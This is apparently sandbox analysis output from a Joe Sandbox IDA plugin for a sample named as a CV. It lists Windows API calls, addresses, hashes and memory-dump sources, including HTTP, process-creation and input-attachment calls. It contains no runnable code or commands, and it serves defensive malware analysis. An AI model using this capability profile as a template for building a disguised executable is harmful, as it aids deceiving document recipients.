                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                            • String ID: 0.0.0.0
                                                                                            • API String ID: 2620052-3771769585
                                                                                            • Opcode ID: fc2966e502dced32c7ebce79e91a7ad362541b1f953ca55f24dea6a65cb3a51a
                                                                                            • Instruction ID: 6e4b8ce0bd30f7c1b3d02b46a1b7d5a29a20ea6e0d23f27ecfba6d73c30fd3ef
                                                                                            • Opcode Fuzzy Hash: fc2966e502dced32c7ebce79e91a7ad362541b1f953ca55f24dea6a65cb3a51a
                                                                                            • Instruction Fuzzy Hash: B0112771504206AFCB24AB70AC09EDA77ACEF41711F000065F145A60D1EFF09EC08750
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000E5047
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __gmtime64_s.LIBCMT ref: 000E50E0
                                                                                            • __gmtime64_s.LIBCMT ref: 000E5116
                                                                                            • __gmtime64_s.LIBCMT ref: 000E5133
                                                                                            • __allrem.LIBCMT ref: 000E5189
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E51A5
                                                                                            • __allrem.LIBCMT ref: 000E51BC
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E51DA
                                                                                            • __allrem.LIBCMT ref: 000E51F1
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E520F
                                                                                            • __invoke_watson.LIBCMT ref: 000E5280
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                            • String ID:
                                                                                            • API String ID: 384356119-0
                                                                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                            • Instruction ID: cfba754576692f506d0b7205c89370ef551967070ca2a8ddb58018e73b44a973
                                                                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                            • Instruction Fuzzy Hash: 9B71F971A00B57AFD7149E7ACC41BAAB3E8AF05369F14462EF614F7682E770D94087D0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00104DF8
                                                                                            • GetMenuItemInfoW.USER32(00181708,000000FF,00000000,00000030), ref: 00104E59
                                                                                            • SetMenuItemInfoW.USER32(00181708,00000004,00000000,00000030), ref: 00104E8F
                                                                                            • Sleep.KERNEL32(000001F4), ref: 00104EA1
                                                                                            • GetMenuItemCount.USER32(?), ref: 00104EE5
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00104F01
                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00104F2B
                                                                                            • GetMenuItemID.USER32(?,?), ref: 00104F70
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00104FB6
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104FCA
                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                            • String ID:
                                                                                            • API String ID: 4176008265-0
                                                                                            • Opcode ID: f02c18b04b00e65672891b749a40b5c35f36f6948d9ea6c8364fe993714438cc
                                                                                            • Instruction ID: f1c7a679884b36324addac205e1e3200309e61454b6c8f6c09ff598cfc314bf5
                                                                                            • Opcode Fuzzy Hash: f02c18b04b00e65672891b749a40b5c35f36f6948d9ea6c8364fe993714438cc
                                                                                            • Instruction Fuzzy Hash: 8F61A2B590024AAFDF11CFA8DCC4AAE7BB9FB45304F140459FA81A72A1D7B0AD45CB60
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00129C98
                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00129C9B
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00129CBF
                                                                                            • _memset.LIBCMT ref: 00129CD0
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00129CE2
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00129D5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                            • String ID:
                                                                                            • API String ID: 830647256-0
                                                                                            • Opcode ID: 0a59fd2cd665874f163e90d088c9b31c85bf845046f3028d1675f136778af608
                                                                                            • Instruction ID: 082d7a3bf9807378f7372d8a49406b5937104503e07b8a69e5124697f3fcffbe
                                                                                            • Opcode Fuzzy Hash: 0a59fd2cd665874f163e90d088c9b31c85bf845046f3028d1675f136778af608
                                                                                            • Instruction Fuzzy Hash: 8361AE75900218AFDB10DFA8DC81EEE77B8EF09714F14415AFA04E72A1D770AE52DB50
                                                                                            APIs
                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000F94FE
                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 000F9549
                                                                                            • VariantInit.OLEAUT32(?), ref: 000F955B
                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 000F957B
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 000F95BE
                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 000F95D2
                                                                                            • VariantClear.OLEAUT32(?), ref: 000F95E7
                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 000F95F4
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F95FD
                                                                                            • VariantClear.OLEAUT32(?), ref: 000F960F
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F961A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                            • String ID:
                                                                                            • API String ID: 2706829360-0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CoInitialize.OLE32 ref: 0011ADF6
                                                                                            • CoUninitialize.OLE32 ref: 0011AE01
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0014D8FC,?), ref: 0011AE61
                                                                                            • IIDFromString.OLE32(?,?), ref: 0011AED4
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011AF6E
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011AFCF
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                            • API String ID: 834269672-1287834457
                                                                                            APIs
                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00118168
                                                                                            • inet_addr.WSOCK32(?), ref: 001181AD
                                                                                            • gethostbyname.WSOCK32(?), ref: 001181B9
                                                                                            • IcmpCreateFile.IPHLPAPI ref: 001181C7
                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00118237
                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0011824D
                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001182C2
                                                                                            • WSACleanup.WSOCK32 ref: 001182C8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                            • String ID: Ping
                                                                                            • API String ID: 1028309954-2246546115
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010E396
                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0010E40C
                                                                                            • GetLastError.KERNEL32 ref: 0010E416
                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0010E483
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                            • API String ID: 4194297153-14809454
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000FB98C
                                                                                            • GetDlgCtrlID.USER32 ref: 000FB997
                                                                                            • GetParent.USER32 ref: 000FB9B3
                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000FB9B6
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FB9BF
                                                                                            • GetParent.USER32(?), ref: 000FB9DB
                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000FB9DE
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CtrlParent
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 1383977212-1403004172
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000FBA73
                                                                                            • GetDlgCtrlID.USER32 ref: 000FBA7E
                                                                                            • GetParent.USER32 ref: 000FBA9A
                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000FBA9D
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FBAA6
                                                                                            • GetParent.USER32(?), ref: 000FBAC2
                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000FBAC5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CtrlParent
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 1383977212-1403004172
                                                                                            APIs
                                                                                            • GetParent.USER32 ref: 000FBAE3
                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 000FBAF8
                                                                                            • _wcscmp.LIBCMT ref: 000FBB0A
                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000FBB85
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                            • API String ID: 1704125052-3381328864
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011B2D5
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011B302
                                                                                            • CoUninitialize.OLE32 ref: 0011B30C
                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0011B40C
                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0011B539
                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0011B56D
                                                                                            • CoGetObject.OLE32(?,00000000,0014D91C,?), ref: 0011B590
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0011B5A3
                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0011B623
                                                                                            • VariantClear.OLEAUT32(0014D91C), ref: 0011B633
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2395222682-0
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 000EACC1
                                                                                              • Part of subcall function 000E7CF4: __mtinitlocknum.LIBCMT ref: 000E7D06
                                                                                              • Part of subcall function 000E7CF4: EnterCriticalSection.KERNEL32(00000000,?,000E7ADD,0000000D), ref: 000E7D1F
                                                                                            • __calloc_crt.LIBCMT ref: 000EACD2
                                                                                              • Part of subcall function 000E6986: __calloc_impl.LIBCMT ref: 000E6995
                                                                                              • Part of subcall function 000E6986: Sleep.KERNEL32(00000000,000003BC,000DF507,?,0000000E), ref: 000E69AC
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000EACED
                                                                                            • GetStartupInfoW.KERNEL32(?,00176E28,00000064,000E5E91,00176C70,00000014), ref: 000EAD46
                                                                                            • __calloc_crt.LIBCMT ref: 000EAD91
                                                                                            • GetFileType.KERNEL32(00000001), ref: 000EADD8
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000EAE11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Similarity
                                                                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                            APIs
                                                                                            • __swprintf.LIBCMT ref: 001067FD
                                                                                            • __swprintf.LIBCMT ref: 0010680A
                                                                                              • Part of subcall function 000E172B: __woutput_l.LIBCMT ref: 000E1784
                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00106834
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00106840
                                                                                            • LockResource.KERNEL32(00000000), ref: 0010684D
                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0010686D
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0010687F
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0010688E
                                                                                            • LockResource.KERNEL32(?), ref: 0010689A
                                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001068F9
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00104047
                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001030A5,?,00000001), ref: 0010405B
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00104062
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 00104071
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00104083
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 0010409C
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 001040AE
                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 001040F3
                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 00104108
                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 00104113
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 000DB496
                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 000DB4A0
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 000DB4B5
                                                                                            • GetStockObject.GDI32(00000005), ref: 000DB4BD
                                                                                            • GetClientRect.USER32(?), ref: 0013DD63
                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0013DD7A
                                                                                            • GetWindowDC.USER32(?), ref: 0013DD86
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0013DD95
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013DDA7
                                                                                            • GetSysColor.USER32(00000005), ref: 0013DDC5
                                                                                            Similarity
                                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                            APIs
                                                                                            • EnumChildWindows.USER32(?,000FCF50), ref: 000FCE90
                                                                                            Similarity
                                                                                            • API ID: ChildEnumWindows
                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000C30DC
                                                                                            • CoUninitialize.OLE32(?,00000000), ref: 000C3181
                                                                                            • UnregisterHotKey.USER32(?), ref: 000C32A9
                                                                                            • DestroyWindow.USER32(?), ref: 00135079
                                                                                            • FreeLibrary.KERNEL32(?), ref: 001350F8
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00135125
                                                                                            Similarity
                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                            • String ID: close all
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 000DCC15
                                                                                              • Part of subcall function 000DCCCD: GetClientRect.USER32(?,?), ref: 000DCCF6
                                                                                              • Part of subcall function 000DCCCD: GetWindowRect.USER32(?,?), ref: 000DCD37
                                                                                              • Part of subcall function 000DCCCD: ScreenToClient.USER32(?,?), ref: 000DCD5F
                                                                                            • GetDC.USER32 ref: 0013D137
                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0013D14A
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0013D158
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0013D16D
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013D175
                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0013D200
                                                                                            Similarity
                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                            • String ID: U
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                              • Part of subcall function 000DB63C: GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                              • Part of subcall function 000DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0012ED3C
                                                                                            • ImageList_EndDrag.COMCTL32 ref: 0012ED42
                                                                                            • ReleaseCapture.USER32 ref: 0012ED48
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0012EDF0
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0012EE03
                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0012EEDC
                                                                                            Similarity
                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                            • API String ID: 1924731296-2107944366
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001145FF
                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0011462B
                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0011466D
                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00114682
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0011468F
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001146BF
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00114706
                                                                                              • Part of subcall function 00115052: GetLastError.KERNEL32(?,?,001143CC,00000000,00000000,00000001), ref: 00115067
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                            • String ID:
                                                                                            • API String ID: 1241431887-3916222277
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0015DC00), ref: 0011B715
                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0015DC00), ref: 0011B749
                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0011B8C1
                                                                                            • SysFreeString.OLEAUT32(?), ref: 0011B8EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                            • String ID:
                                                                                            • API String ID: 560350794-0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001224F5
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00122688
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001226AC
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001226EC
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012270E
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0012286F
                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001228A1
                                                                                            • CloseHandle.KERNEL32(?), ref: 001228D0
                                                                                            • CloseHandle.KERNEL32(?), ref: 00122947
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                            • String ID:
                                                                                            • API String ID: 4090791747-0
                                                                                            APIs
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0012B3F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateRect
                                                                                            • String ID:
                                                                                            • API String ID: 634782764-0
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0013DB1B
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0013DB3C
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0013DB51
                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0013DB6E
                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0013DB95
                                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,000DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0013DBA0
                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0013DBBD
                                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,000DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0013DBC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
